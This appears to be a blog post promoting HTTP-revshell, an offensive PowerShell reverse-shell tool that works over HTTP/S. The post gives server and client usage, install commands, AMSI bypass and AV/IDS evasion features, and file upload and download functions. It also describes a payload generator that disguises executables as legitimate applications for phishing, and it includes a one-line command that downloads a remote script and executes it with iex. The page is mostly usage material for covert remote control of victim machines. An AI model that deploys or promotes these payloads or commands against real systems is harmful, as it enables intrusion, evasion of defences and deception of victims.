Exploitation Tools

HTTP-revshell – Powershell Reverse Shell Using HTTP/S Protocol

HTTP-revshell - Powershell Reverse Shell Using HTTP/S Protocol With AMSI Bypass And Proxy Aware

 

HTTP-revshell is a tool focused on redteam exercises and pentesters. This tool provides a reverse connection through the http/s protocol. It use a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS and AV.

Help server.py (unisession server)
Server usage:

usage: server.py [-h] [--ssl] [--autocomplete] host port
Process some integers.
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions

Help Invoke-WebRev.ps1 (client)
Client usage:

Import-Module .Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Installation

git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Quick start server-multisession.py (multisession server)

This server allows multiple connection of clients.
There is a menu with three basic commands: sessions, interact and exit
     - sessions --> show currently active sessions
     - interact --> interacts with a session (Example: interact <session_id>)
     - exit --> close the application

IMPORTANT: To change the session press CTRL+d to exit the current session without closing it.

Features

  • SSL
  • Proxy Aware
  • Upload Function
  • Download Function
  • Error Control
  • AMSI bypass
  • Multiple sessions [only server-multisession.py]
  • Autocomplete PowerShell functions (optional) [only server.py]

Extra functions usage

Upload

  • upload /src/path/file C:destpathfile

Download

  • download C:srcpathfile /dst/path/file

Help Revshell-Generator.ps1 (Automatic Payload Generator)
This script allows you to create an executable file with the payload necessary to use HTTP-revshell, you just need to follow the instructions on the screen to generate it. There are 6 predefined templates and a customizable one, with the data that you like.
The payloads generated by the tool, incorporate the legitimate icon of the application, as well as the product and copyright information of the original application. In addition, each of them opens the original application before establishing the connection with the server, pretending to be a legitimate application. This can be used for phishing or Red Team exercises.
Payload Generator usage:

iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/Revshell-Generator.ps1 | iex

 

IMPORTANT: All fields in predefined templates are auto-complete by pressing the enter key.

Credits


About the author

Mazen Elzanaty

Add Comment

Click here to post a comment

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: